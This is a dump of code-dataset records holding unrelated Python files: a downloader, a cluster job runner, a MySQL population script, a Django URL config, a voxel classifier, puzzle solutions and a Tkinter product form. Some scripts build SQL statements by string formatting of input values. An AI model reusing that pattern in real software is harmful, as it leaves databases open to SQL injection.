random.choice(user_agents)\n req1 = urllib.request.Request(url=r['url'], headers={\"Connection\": \"close\",\n 'User-Agent': ua})\n f = urllib.request.urlopen(req1, timeout=40)\n file_name = f\"./download/{r['file_name']}\"\n with open(file_name, 'wb') as file:\n file.write(f.read())\n count += 1\n print(count)\n except Exception as e:\n print(e)\n\n\nif __name__ == \"__main__\":\n try:\n main()\n except Exception as exm:\n print(exm)\n","sub_path":"test_download_file.py","file_name":"test_download_file.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"181078435","text":"'''\nRun a pipeline stage either locally or on the cluster,\ntaking into account the configuration settings,\nand command line options of the pipeline.\n'''\n\nfrom ruffus.drmaa_wrapper import run_job, error_drmaa_job\n\n#Install drmaa and set drmaa to virtual environment\n\n#export SGE_ROOT=\"/var/lib/gridengine\"\n\n# sun grid engine memory is requested in MB, but the config file specifies in GB\nMEGABYTES_IN_GIGABYTE = 1024\n\n'''\nSGE options:\n\n-account=name Charge job to specified accounts\n-mem=MB Minimum amount of real memory\n-mem-per-cpu=MB Maximum amount of real memory per allocated cpu\n required by a job\n-nodes=N Number of nodes on which to run (N = min[-max])\n-pe -serial=n Number of tasks to invoke on each node\n-M a\t Notify user by email when certain event types\n occur. Valid type values are BEGIN, END, FAIL,\n REQUEUE, and ALL (any state change)\n'''\n\ndef run_stage(state, stage, command):\n '''Run a pipeline stage, either locally or on the cluster'''\n\n # Grab the configuration options for this stage\n config = state.config\n modules = config.get_stage_option(stage, 'modules')\n mem = config.get_stage_option(stage, 'mem') * MEGABYTES_IN_GIGABYTE \n account = config.get_stage_option(stage, 'account')\n queue = config.get_stage_option(stage, 'queue')\n walltime = config.get_stage_option(stage, 'walltime')\n run_local = config.get_stage_option(stage, 'local')\n cores = config.get_stage_option(stage, 'cores')\n pipeline_id = config.get_option('pipeline_id')\n job_name = pipeline_id + '_' + stage\n\n # Generate a \"module load\" command for each required module\n \n module_loads = '. 
/etc/profile.d/module.sh\\n' + '\\n'.join(['module load ' + module for module in modules])\n cluster_command = '\\n'.join([module_loads, command])\n\n #Specify job-specific options for SGE\n job_options = '-q {queue} -pe serial {cores} -l docker=1 -l h_vmem={mem}M -M {account}'.format( cores=cores, queue=queue, mem=mem, account=account) \n\n\n # Log a message about the job we are about to run\n log_messages = ['Running stage: {}'.format(stage),\n 'Command: {}'.format(command)]\n if not run_local:\n log_messages.append('Job options: {}'.format(job_options))\n state.logger.info('\\n'.join(log_messages))\n\n # Run the job, capturing stdout and stderr\n stdout_res, stderr_res = None, None\n try:\n stdout_res, stderr_res = \\\n run_job(cmd_str=cluster_command,\n job_name = job_name,\n logger = state.logger.proxy,\n drmaa_session = state.drmaa_session,\n # Determines whether to run the command on the local\n # machine or run it on the cluster\n run_locally = run_local,\n # Keep a copy of the job script for diagnostic purposes\n retain_job_scripts = True,\n #retain_stdout = True,\n #retain_stderr = True,\n job_script_directory = state.options.jobscripts, \n job_other_options = job_options)\n except error_drmaa_job as err:\n raise Exception(\"\\n\".join(map(str, [\"Failed to run:\", command, err, stdout_res, stderr_res])))\n","sub_path":"src/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"162395008","text":"from FgzWriter import FgzWriter\nfrom ..files import Dir\n\nclass FgzPacker:\n\tdef __init__(self,working_dir,target_dir):\n\t\tself.m_workingDir=[]\n\t\tfor d in working_dir:\n\t\t\tself.m_workingDir.append(Dir.Dir_toStdName(d))\n\n\t\tself.m_targetDir=Dir.Dir_toStdName(target_dir)\n\t\tself.m_packageName=\"fdata.fgz\"\n\n\t\tself.m_ignoreFileExt=[]\n\t\tself.m_notCompressFileExt=[]\n\n\t\n\tdef setPackageName(self,name):\n\t\tself.m_packageName=name \n\n\tdef setIngoreFileExt(self,exts):\n\t\tself.m_ignoreFileExt=exts \n\n\tdef setNotCompressFileExt(self,exts):\n\t\tself.m_notCompressFileExt=exts\n\n\tdef ingoreFile(self,filename):\n\t\tfor ext in self.m_ignoreFileExt:\n\t\t\tif filename.endswith(ext):\n\t\t\t\treturn True \n\n\t\treturn False\n\n\tdef notCompressFile(self,filename):\n\t\tfor ext in self.m_notCompressFileExt:\n\t\t\tif filename.endswith(ext):\n\t\t\t\treturn True \n\n\t\treturn False\n\n\n\n\n\n\n\tdef pack(self):\n\t\tpack_files=[]\n\t\tfor d in self.m_workingDir:\n\t\t\tdiry=Dir.Dir(d)\n\t\t\tall_files=diry.listFiles()\n\t\t\tall_files=[f for f in all_files if not self.ingoreFile(f) ]\n\t\t\tpack_files.append({\"dir\":d,\"files\":all_files})\n\n\n\t\twriter=FgzWriter()\n\t\tfor info in pack_files:\n\t\t\tdirname=info[\"dir\"]\n\t\t\tfiles=info[\"files\"]\n\n\t\t\tfor f in files:\n\t\t\t\tif self.notCompressFile(f):\n\t\t\t\t\tmethod=\"store\"\n\t\t\t\telse:\n\t\t\t\t\tmethod=\"deflate\"\n\n\t\t\t\tfile_name=dirname+f\n\t\t\t\twriter.addFile(file_name,f,method)\n\n\t\tpackage_path=self.m_targetDir+self.m_packageName\n\t\twriter.pack(package_path)\n\n\n\n\n\n\n\n\n","sub_path":"tool/binpy/libpy/data/FgzPacker.py","file_name":"FgzPacker.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"132600908","text":"import mysql.connector\nimport argparse\nimport subprocess\nimport json\n\n\nPIPE = subprocess.PIPE\n\ndef getfullpath(model):\n\tr = 
subprocess.run(\"pwd\",shell= True,stdout=PIPE)\n\tpath=r.stdout.decode().strip()\n\treturn \"{}/{}\".format(path,model)\n\ndef getbuglist(path):\n\tr = subprocess.run(\"ls -1 {}\".format(path),shell = True, stdout = PIPE)\n\tlines=r.stdout.decode().strip()\n\tlines=lines.split(\"\\n\")\n\trl = []\n\tfor l in lines:\n\t\trl.append((l,\"{}/{}\".format(path,l)))\n\treturn rl \n\ndef get_tags_list(path):\n\tfilename=\"{}/tag.json\".format(path)\n\tdata = {'Tags':[]}\n\twith open(filename) as f:\n\t\tlines = f.read().strip()\n\t\tif lines != \"\":\n\t\t\tdata=json.loads(lines)\n\n\treturn data['Tags']\n\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('-host', required = True)\n\tparser.add_argument('-user',required = True)\n\tparser.add_argument('-passwd',required=False)\n\tparser.add_argument('-database',required=True)\n\targs = parser.parse_args()\n\tpassword = args.passwd if args.passwd != None else \"\"\n\tmydb = mysql.connector.connect( host=args.host, user=args.user, passwd=password, database=args.database)\n\tmycursor = mydb.cursor()\n\n\t# creating the tables\n\tmycursor.execute(\"DROP TABLE IF EXISTS bugRecord\")\n\tmycursor.execute(\"DROP TABLE IF EXISTS bugCollection\")\n\tmycursor.execute(\"DROP TABLE IF EXISTS bugCatagories\")\n\tmycursor.execute(\"DROP TABLE IF EXISTS programmingModel\")\n\n\n\tmycursor.execute(\"CREATE TABLE bugCollection (ID INT AUTO_INCREMENT PRIMARY KEY, name VARCHAR(255) UNIQUE, folderPath VARCHAR(255) ) \")\n\tmycursor.execute(\"CREATE TABLE bugCatagories (ID INT AUTO_INCREMENT PRIMARY KEY, name VARCHAR(255) UNIQUE) \")\n\tmycursor.execute(\"CREATE TABLE programmingModel(ID INT AUTO_INCREMENT PRIMARY KEY, name VARCHAR(255)UNIQUE ) \")\n\t\n\tmycursor.execute(\"CREATE TABLE bugRecord (ID INT AUTO_INCREMENT PRIMARY KEY, Bug_id INTEGER, PM_id INTEGER, Cate_id INTEGER,\\\n\t\tFOREIGN KEY(Bug_id) REFERENCES bugCollection(ID),\\\n\t\tFOREIGN KEY(PM_id) REFERENCES programmingModel(ID),\\\n\t\tFOREIGN KEY(Cate_id ) REFERENCES bugCatagories(ID))\")\n\tmydb.commit()\n\t# insert into tables\n\n\t# insert data into programming model table\n\tmodels = [\"MPI\",\"OPENMP\", \"CUDA\"]\n\tfor model in models:\n\t\tsql = \"INSERT INTO programmingModel (name) VALUES ('{}')\".format(model)\n\t\tmycursor.execute(sql)\n\t\n\tmydb.commit()\n\t\n\n\t# insert data into other tables\n\tfor model in models:\n\t\tfullpath=getfullpath(model)\n\t\t#print(fullpath)\n\t\tbuglist=getbuglist(fullpath)\n\t\tfor bug,path in buglist:\n\t\t\t#print(bug,path)\n\n\t\t\t#insert into bug collection table\n\t\t\tsql = \"INSERT INTO bugCollection (name, folderPath) VALUES (%s, %s)\"\n\t\t\tvalue=(\"{}_{}\".format(model,bug),path)\n\t\t\tmycursor.execute(sql, value)\n\t\t\tmydb.commit()\n\t\t\tbug_id = mycursor.lastrowid\n\n\t\t\t#insert into bug categories table\n\t\t\ttags = get_tags_list(path)\n\t\t\tfor t in tags:\n\t\t\t\tsql = \"INSERT IGNORE INTO bugCatagories (name) VALUES ('{}')\".format(t)\n\t\t\t\tmycursor.execute(sql)\n\t\t\t\tmydb.commit()\n\n\t\t\t#insert into bug record table\n\t\t\tget_pm_id_query = \"select ID from programmingModel where name = '{}'\".format(model)\n\t\t\tmycursor.execute(get_pm_id_query)\n\t\t\tpm_id = mycursor.fetchone()[0]\n\n\t\t\tfor t in tags:\n\t\t\t\tget_tag_id_query = \"select ID from bugCatagories where name = '{}'\".format(t)\n\t\t\t\tmycursor.execute(get_tag_id_query)\n\t\t\t\ttag_id = mycursor.fetchone()[0]\n\t\t\t\tsql = \"INSERT INTO bugRecord (Bug_id,PM_id, Cate_id) VALUES 
({},{},{})\".format(bug_id,pm_id,tag_id)\n\t\t\t\t#value = (bug_id,pm_id,tag_id)\n\t\t\t\tmycursor.execute(sql)\n\t\t\tmydb.commit()\n\n\n","sub_path":"bug_database_with_UI_iteration0/Bug_Collection/Data_Populate.py","file_name":"Data_Populate.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"66617472","text":"s = list(input())\nk = int(input())\n\ndef count_replace(l):\n    ret = 0\n    cnt = 1\n    for i in range(len(l)-1):\n        if l[i] == l[i+1]:\n            cnt += 1\n        elif l[i] != l[i+1]:\n            ret += cnt//2\n            cnt = 1\n    ret += cnt // 2 # handle the tail once the loop runs out: if the string ended in a run, its contribution is added, otherwise 0 is added\n    return ret\n\nif len(set(s)) == 1: # when all characters are the same\n    ans = (len(s) * k) // 2\nelif s[0] != s[-1]: # when the first and last characters differ\n    ans = count_replace(s)\n    ans = k * ans\nelse: # the first and last characters match\n    # length of the run of equal characters at the head\n    cnt_pre = 1\n    for i in range(len(s)-1):\n        if s[i] == s[i+1]:\n            cnt_pre += 1\n        else:\n            break\n    # length of the run of equal characters at the tail\n    cnt_pos = 1\n    for i in reversed(range(len(s))):\n        if s[i] == s[i-1]:\n            cnt_pos += 1\n        else:\n            break\n    # head run//2 + tail run//2 + (k-1)*((head+tail run)//2)\n    ans = cnt_pre//2 + cnt_pos//2 + (k-1) * ((cnt_pos+cnt_pre)//2)\n    # count for the part excluding the head and tail runs\n    ret = count_replace(s[cnt_pre:-cnt_pos])\n    ans += k * ret\n\nprint(ans)","sub_path":"Python_codes/p02891/s689177862.py","file_name":"s689177862.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"304399280","text":"#!/usr/bin/env python\n\ndef get_server_state(netdict,cpuinfo,cpuload,memfree,tcpcount,syncount):\n    state = {}\n    use = cpuinfo\n    load = cpuload\n    mem = memfree\n    tcp = tcpcount\n    syn = syncount\n    inflow = round(float(netdict['inflow'])/1024/1024*8,2)\n    outflow = round(float(netdict['outflow'])/1024/1024*8,2)\n    inpackage = netdict['inpackage']\n    outpackage = netdict['outpackage']\n    #cpu\n    if int(use) > 50:\n        cpuuse = 1\n    else:\n        cpuuse = 0\n    if float(load[1]) > 100:\n        cpuload = 1\n    elif float(load[2]) > 100:\n        cpuload = 1\n    else:\n        cpuload = 0\n    state['use'] = cpuuse\n    state['load'] = cpuload\n    #mem\n    if int(mem) < 10:\n        memuse = 1\n    else:\n        memuse = 0\n    state['mem'] = memuse\n    #count\n    if int(tcp) > 10000:\n        count = 1\n    elif int(syn) > 300:\n        count = 1\n    else:\n        count = 0\n    state['count'] = count\n    #network\n    if int(inflow) > 300:\n        flow = 1\n    elif int(outflow) > 1000:\n        flow = 1\n    else:\n        flow = 0\n    if int(inpackage) > int(outpackage):\n        package = 1\n    else:\n        package = 0\n    state['flow'] = flow\n    state['package'] = package\n    \n    return state\n","sub_path":"monitor-client/linux/sysstate.py","file_name":"sysstate.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"113798941","text":"def sum2(nums):\n    sum = 0\n    if len(nums) == 0:\n        return 0\n    elif len(nums) <= 2:\n        for i in nums:\n            sum += i\n    else:\n        for i in range(2):\n            sum += nums[i]\n    return sum","sub_path":"lab7/codingBat/list-1/sum2.py","file_name":"sum2.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"87373339","text":"\nfrom django.contrib import admin\nfrom django.urls import path, include\n\n\nurlpatterns = [\n    path('api-auth/', include('rest_framework.urls')),\n    path('admin/', admin.site.urls),\n    path('api/', include('articles.urls')),\n    #path('api/v1/auth/login/',LoginView.as_view()),\n    #path('api/v1/auth/logout/',LogoutView.as_view()),\n    
#path('api/v1/auth/', include ('rest_framework.urls'))\n]\n","sub_path":"djangoreact/backend/src/djangoreact/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"188715426","text":"import torch.nn as nn\nfrom model.net import *\nimport torch.utils.data as data\nimport numpy as np\nfrom utils import helper\nimport random\nimport torch\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\nimport copy\nimport os\nclass voxnet(nn.Module):\n def __init__(self):\n super().__init__()\n self.body = frequency_encoder()\n self.end_line = nn.Linear(256,40)\n\n def forward(self,x):\n x = self.body(x)\n x = x.view(x.size(0),-1)\n return self.end_line(x)\n\nclass genvoxnetDataset(data.Dataset):\n def __init__(self, npz_file):\n data = np.load(npz_file)\n self.vox = data['vox']\n self.target = data['target']\n self.freq = data['freq']\n self.filename = data['filename']\n\n def trans(self,filename):\n self.label = np.zeros(len(self.vox))\n self.type = []\n for i in range(len(self.vox)):\n name = self.filename[i].split('\\\\')[-1][:-9]\n if not name in self.type:\n self.type.append(name)\n for i in range(len(self.vox)):\n name = self.filename[i].split('\\\\')[-1][:-9]\n self.label[i] = self.type.index(name)\n\n np.savez_compressed(filename,\n vox=self.vox,\n target=self.target,\n freq=self.freq,\n filename=self.filename,\n label=self.label\n )\n \n\ndef gen_full_dataset():\n genvoxnetDataset('dataset\\\\test\\\\all.npz').trans('dataset\\\\test\\\\all_full.npz')\n genvoxnetDataset('dataset\\\\train\\\\all.npz').trans('dataset\\\\train\\\\all_full.npz')\n\n\ndef rotate(x,axis = [0,2]):\n k = random.randint(0,3)\n for i in x:\n if x[i].dim() < 2:\n continue\n x[i] = torch.rot90(x[i],k,axis)\n return x\n\nclass voxnetDataset(data.Dataset):\n def __init__(self, npz_file):\n data = np.load(npz_file)\n self.vox = data['vox']\n self.label = data['label']\n def __len__(self):\n return len(self.vox)\n\n def __getitem__(self, idx):\n\n vox = self.vox[idx]\n label = self.label[idx]\n\n item = {\n 'vox': torch.as_tensor(vox, dtype=torch.float32),\n 'label': torch.as_tensor(label, dtype=torch.long),\n }\n\n item = rotate(item)\n\n return item\n\ndef train():\n loader = {\n 'train':DataLoader(voxnetDataset('dataset\\\\train\\\\all_full.npz'), batch_size=32,shuffle=True,drop_last=True,num_workers=0),\n 'test':DataLoader(voxnetDataset('dataset\\\\test\\\\all_full.npz'), batch_size=32,shuffle=True,drop_last=True,num_workers=0),\n }\n model = voxnet().cuda()\n optimizer = optim.Adam(model.parameters(), lr=0.01)\n scheduler = lr_scheduler.StepLR(optimizer, step_size=20, gamma=0.5)\n root_dir = 'result\\\\voxnet'\n best_loss = None\n for epoch in range(100):\n for phase in ['train', 'test']:\n losses = []\n correct = 0.\n all = 0.\n for i, data in tqdm(enumerate(loader[phase])):\n optimizer.zero_grad()\n inputs = data['vox'].cuda()\n labels = data['label'].cuda()\n \n with torch.set_grad_enabled(phase == 'train'):\n outputs = model(inputs)\n loss = nn.CrossEntropyLoss()(outputs, labels)\n losses.append(loss.item())\n _, predicted = torch.max(outputs.detach(), 1)\n all += len(inputs)\n correct += (predicted == labels).cpu().sum()\n if phase == 'train':\n loss.backward()\n optimizer.step()\n \n loss = np.array(losses).mean()\n print(phase + ':',loss)\n print('acc:{}'.format(correct / all))\n if phase == 'test':\n if best_loss is 
None or best_loss > loss:\n best_loss = loss\n best_model_wts = copy.deepcopy(model.state_dict())\n if epoch % 20 == 0:\n torch.save(best_model_wts, os.path.join(root_dir, 'voxnet_best.weights'))\n else:\n scheduler.step()\n\nif __name__ == \"__main__\":\n train()","sub_path":"voxnet.py","file_name":"voxnet.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"551204304","text":"#!/usr/bin/python\n\"\"\"Merge numpy matrices. Use any 'True' value as merged value.\n\nEXAMPLE USE:\npython merge.py GSE2034.GPL96.eQTL.tab.compiled.values.npy GSE2034.GPL96.eQTL.tab.missing.values.npy GSE2034.GPL96.eQTL.tab.low25.values.npy\n\"\"\"\n\nimport sys\nimport numpy as np\nfrom py_symmetric_matrix import *\n\ndef main(m_files):\n M = np.load(m_files[0])\n for m_file in m_files[1:]:\n Q = np.load(m_file)\n for i, v in enumerate(Q):\n if v:\n M[i] = v\n np.save(m_files[0]+\".merged.%d.npy\" % len(m_files), M)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"163828143","text":"from PyQt4 import QtGui, QtCore\n\nclass DeviceConfigPanel(QtGui.QWidget):\n def __init__(self, parent):\n QtGui.QWidget.__init__(self, parent)\n\n self.parent = parent\n \n #Status\n self.errorMessage = QtGui.QCommandLinkButton(\"The Device browser has not been fully implemented yet.\", self)\n self.errorMessage.resize(500,60)\n self.errorMessage.setIcon(QtGui.QIcon(\"Icons/cross.png\"))\n self.errorMessage.setEnabled(False)\n \n \n \n def resizeEvent(self,event):\n self.moveComponents()\n \n def moveComponents(self):\n self.errorMessage.move(self.width()/2-240, self.height()/2-30)\n \n \n def paintEvent(self, event):\n paint = QtGui.QPainter()\n paint.begin(self)\n \n size = self.size()\n w = size.width()\n h = size.height()\n \n paint.setPen(QtGui.QColor(200,200, 200))\n paint.setBrush(QtGui.QColor(235, 235, 235))\n paint.drawRect(0,0,w,h)\n \n paint.end()\n \n \n","sub_path":"Coherence-Config/Coherence-Config/UI/DeviceConfigPanel.py","file_name":"DeviceConfigPanel.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"541663384","text":"##############################################################################\n#\n# Copyright (c) 2001, 2002 Zope Foundation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). 
A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"This is a simple implementation of the ITranslationDomain interface.\n\"\"\"\nfrom zope.component import getUtility\nfrom zope.interface import implementer\n\nfrom zope.i18n import interpolate\nfrom zope.i18n.interfaces import INegotiator\nfrom zope.i18n.interfaces import ITranslationDomain\n\n\n@implementer(ITranslationDomain)\nclass SimpleTranslationDomain:\n \"\"\"This is the simplest implementation of the ITranslationDomain I\n could come up with.\n\n The constructor takes one optional argument 'messages', which will be\n used to do the translation. The 'messages' attribute has to have the\n following structure:\n\n {('language', 'msg_id'): 'message', ...}\n\n Note: This Translation Domain does not use message catalogs.\n \"\"\"\n\n # See zope.i18n.interfaces.ITranslationDomain\n domain = None\n\n def __init__(self, domain, messages=None):\n \"\"\"Initializes the object. No arguments are needed.\"\"\"\n self.domain = (\n domain.decode(\"utf-8\") if isinstance(domain, bytes) else domain)\n self.messages = messages if messages is not None else {}\n assert self.messages is not None\n\n def translate(self, msgid, mapping=None, context=None,\n target_language=None, default=None, msgid_plural=None,\n default_plural=None, number=None):\n '''See interface ITranslationDomain'''\n # Find out what the target language should be\n if target_language is None and context is not None:\n langs = [m[0] for m in self.messages.keys()]\n # Let's negotiate the language to translate to. 
:)\n negotiator = getUtility(INegotiator)\n target_language = negotiator.getLanguage(langs, context)\n\n # Find a translation; if nothing is found, use the default\n # value\n if default is None:\n default = str(msgid)\n text = self.messages.get((target_language, msgid))\n if text is None:\n text = default\n return interpolate(text, mapping)\n","sub_path":"src/zope/i18n/simpletranslationdomain.py","file_name":"simpletranslationdomain.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"403755724","text":"# plugging in adapters\r\n# socket has 0 jolts\r\n# an adapter with n jolts takes >=(n-3) jolts as input, outputs n jolts\r\n# device has a built-in joltage adapter for 3 + max(external adapters)\r\n# how many legal arrangements are there?\r\n\r\n# input\r\nwith open('10.txt', 'r') as file:\r\n input = file.read()\r\n\r\n# turn the input into a list, one element is one number as a string\r\ninput_list = list(input.split('\\n'))\r\n# get a list of numbers instead of strings\r\n# append on socket joltage\r\n# append on device joltage\r\n# sort\r\nadapters = [int(n) for n in input_list]\r\nadapters.append(0)\r\nadapters.append(max(adapters) + 3)\r\nadapters.sort()\r\n\r\n# look at the list of vital adapters\r\n# (socket, device, or either side of a break of 3)\r\nvital_adapters = []\r\nvital_adapters.append(0)\r\nfor i in range(0, len(adapters)-1):\r\n if adapters[i+1] - adapters[i] == 3:\r\n # either side of a break of 3, and hasn't been added already\r\n if not i in vital_adapters:\r\n vital_adapters.append(i)\r\n if not i+1 in vital_adapters:\r\n vital_adapters.append(i+1)\r\n\r\n# naively getting all legal arrangements of a string of non-vitals\r\n# between two vitals a and b\r\ndef nv(nab: int):\r\n if nab < 0:\r\n return 1\r\n elif nab == 0:\r\n return 1\r\n elif nab == 1:\r\n return 2\r\n elif nab == 2:\r\n return 4\r\n else: # cannot jump directly, but can go to 1, 2, or 3 away\r\n return nv(nab - 1) + nv(nab - 2) + nv(nab - 3)\r\n\r\nnum_arrangements = 1 # start off by assuming the only arrangement is using all adapters\r\nfor j in range(0,len(vital_adapters)-1): # for every vital adapter with a vital adapter after it\r\n # print(num_arrangements)\r\n # find maximum number of adapters between this vital adapter and the next\r\n # nab = number adapters between\r\n # (the -1 ensures that the next vital adapter is excluded)\r\n nab = vital_adapters[j+1] - vital_adapters[j] - 1\r\n # followed by a (possibly empty) string of non-vitals\r\n # nab=0 => adapters[vital_adapters[j]] is right before a vital adapter\r\n # need to check how many possible arrangements there are\r\n # no jumps of 2, so these will all be 1 apart\r\n num_arrangements = num_arrangements * nv(nab)\r\n # for debugging:\r\n #print('\\nbetween adapters at pos ' + str(vital_adapters[j]) + ' and ' + str(vital_adapters[j+1]))\r\n #print('(with joltage ' + str(adapters[vital_adapters[j]]) + ' and ' + str(adapters[vital_adapters[j+1]]) + ')')\r\n #print(str(adapters[vital_adapters[j]:vital_adapters[j+1]+1]))\r\n #print('we have this many non-vitals in between: ' + str(nab))\r\n #print('which has this many arrangements: ' + str(nv(nab)))\r\n\r\n# show vital adapters:\r\n#print([adapters[i] for i in vital_adapters])\r\nprint(num_arrangements)","sub_path":"10b.py","file_name":"10b.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} 
+{"seq_id":"322196549","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nimport views\nimport settings\nimport os\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n    # Examples:\n    # url(r'^$', 'django_docker.views.home', name='home'),\n    # url(r'^blog/', include('blog.urls')),\n\n    url(r'^admin/', include(admin.site.urls)),\n\turl(r'^$', views.index),\n\turl(r'^index/$', views.index),\n\turl(r'^submit/$', views.submit),\n\turl(r'^search/$', views.search),\n\turl(r'^preview/$', views.preview),\n\turl(r'^static/(?P<path>.*)$', 'django.views.static.serve', {'document_root': os.path.dirname(__file__)+'/static'}),\n\t#url(r'^success/$', views.success),\n\turl(r'^student/insert/$', views.student_insert),\n\turl(r'^student/insert$', views.student_insert),\n\turl(r'^student/find/$',views.student_find),\n)\n","sub_path":"django_docker/django_docker/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"596512615","text":"import pandas as pd\nimport pytest\nimport logging\nimport pickle\nfrom joblib import load\nimport numpy as np\nfrom pandas.core.frame import DataFrame\n\nlogging.basicConfig(\n    filename='./test/test_data.log',\n    level=logging.INFO,\n    filemode='w',\n    format='%(name)s - %(levelname)s - %(message)s')\n\ncat_features = [\n    \"workclass\",\n    \"education\",\n    \"marital-status\",\n    \"occupation\",\n    \"relationship\",\n    \"race\",\n    \"sex\",\n    \"native-country\",\n]\n\n@pytest.fixture\ndef data():\n    '''\n    This fixture returns the data for the tests\n    output:\n        dataframe: pandas dataframe\n    '''\n    try:\n        dataframe = pd.read_csv('data/clean_sample.csv')\n        logging.info(\"import data: SUCCESS\")\n        return dataframe\n    except FileNotFoundError as err:\n        logging.error(\"import data: The file wasn't found\")\n        raise err\n\n\ndef test_data_shape(data):\n    \"\"\" \n    If your data is in the correct shape\n    input:\n        data: pandas dataframe\n    \"\"\"\n    assert data.shape[0] > 0, \"The dataframe has no rows\"\n    assert data.shape[1] > 0, \"The dataframe has no columns\"\n\ndef test_columns_present(data):\n    \"\"\" \n    If columns are present in dataframe\n    input:\n        data: pandas dataframe\n    \"\"\"\n    for category in cat_features:\n        assert category in data.columns, \"The column {} is not in the dataframe\".format(category)\n        assert data[category].shape[0] > 0, \"The column {} is empty\".format(category)\n\ndef test_data_types(data):\n    \"\"\" \n    If data types are correct\n    input:\n        data: pandas dataframe\n    \"\"\"\n    for category in cat_features:\n        assert data[category].dtype == 'object', \"The column {} is not of type object\".format(category)\n    \n","sub_path":"test_data.py","file_name":"test_data.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"332433746","text":"import tkinter as gui\nfrom tkinter import messagebox\nfrom tkinter import *\nfrom tkinter import ttk\nimport mysql.connector # pip install mysql-connector\nimport pymysql # pip install pymysql\nimport time\n\ndef MainProdutos():\n    # Get the highest value in the cod_produto column to put into the Cod entry\n    connection = mysql.connector.connect(host=\"localhost\",user=\"root\",password=\"\",database=\"bdlanchonete\")\n    mycursor = connection.cursor()\n    sqlid = \"SELECT MAX(cod_produto) FROM produtos\"\n    mycursor.execute(sqlid)\n    for i in mycursor:\n        print(i)\n        teste = i\n\n    def VisualisarProddutos():\n        
treeviewproduto.delete(*treeviewproduto.get_children()) #limpa a lista\n connection = mysql.connector.connect(host=\"localhost\",user=\"root\",password=\"\",database=\"bdlanchonete\")\n mycursor = connection.cursor() \n sqlid = \"select * from produtos;\"# sql para pegar os produto\n mycursor.execute(sqlid)\n \n for viwer in mycursor:\n treeviewproduto.insert(\"\",\"end\",values=(viwer))\n \n def CadastrarProdutos():\n connection = mysql.connector.connect(host=\"localhost\",user=\"root\",password=\"\",database=\"bdlanchonete\")\n mycursor = connection.cursor()\n\n\n # abrituindo os valores dos entry a uma variável-----------------\n ean = int(entryean.get())\n nome = str(entrynome.get())\n\n\n # verificando se o produto ja existem----------------------\n sqlselect = \"select * from produtos where ean_produto like {};\".format(ean)\n mycursor.execute(sqlselect)\n valido = mycursor.fetchall() # busca todas as linhas de um resultado de consulta. Ele retorna todas as linhas como uma lista de tuplas. Uma lista vazia é retornada se não houver nenhum registro para buscar.\n\n if len(valido) > 0:\n messagebox.showwarning(\"Warning\",\"Produto já cadastrado!\") \n\n else: # inserindo os dados no banco -----------------------------------\n sqlinsert = \"INSERT INTO produtos (ean_produto, nome_produto, categoria_produto,unidade_produto, descricão_produto, pre_venda_produto, pre_custo_produto, estoque) VALUES ('{}','{}','{}','{}','{}','{}','{}','{}')\".format(ean, nome, comboboxcat.get(),entryUnidade.get(), entrydescrição.get(\"1.0\",END), entryprevenda.get(), entryprecusto.get(), entryestoque.get())\n mycursor.execute(sqlinsert)\n\n \n entrycod[\"state\"] =\"normal\"\n entrycod.delete(0,END)\n entrycod.insert(0,teste[0]+2)\n entrycod[\"state\"] =\"disabled\"\n entryean.delete(0,END)\n entrynome.delete(0,END)\n comboboxcat.set(\"Selecione\")\n entrydescrição.delete(\"1.0\",END)\n entryprecusto.delete(0,END)\n entryprevenda.delete(0,END)\n entryestoque.delete(0,END)\n 